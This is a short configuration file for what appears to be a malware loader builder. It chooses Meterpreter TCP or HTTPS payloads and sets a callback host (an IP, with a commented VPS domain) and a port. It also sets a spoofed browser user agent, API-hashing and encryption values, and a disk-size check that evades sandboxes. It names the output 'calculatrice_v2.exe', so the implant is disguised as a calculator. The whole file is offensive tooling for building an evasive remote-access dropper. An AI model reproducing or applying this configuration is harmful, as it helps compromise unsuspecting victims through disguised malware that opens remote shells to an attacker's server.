[Payload]
################################
#                              #
#          Payloads            #
#                              #
#     - meterpreter_tcp        #
#    - meterpreter_https       #
#       - message_box          #
#                              #
################################
filename=message_box.nasm

# tcp | https
# mode=https
# SHELL & METERPRETER -> TCP
lhost=10.161.114.127
# lhost=8.8.8.8
# lhost=vps.couzi.fr
lport=5050

user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86"


# working:13,17,23
ror_value=23

# unique WORD, need to implement simple syntax check
# rand -> random between 0x0000 and 0xffff
encryption_byte=0x87fa

[Anti-Analysis]
# If disk size is less than <value>, the payload will not be executed
disk_size=300

[Stub]
filename=loader.c
ror_value=13
output_file=calculatrice_v2.exe

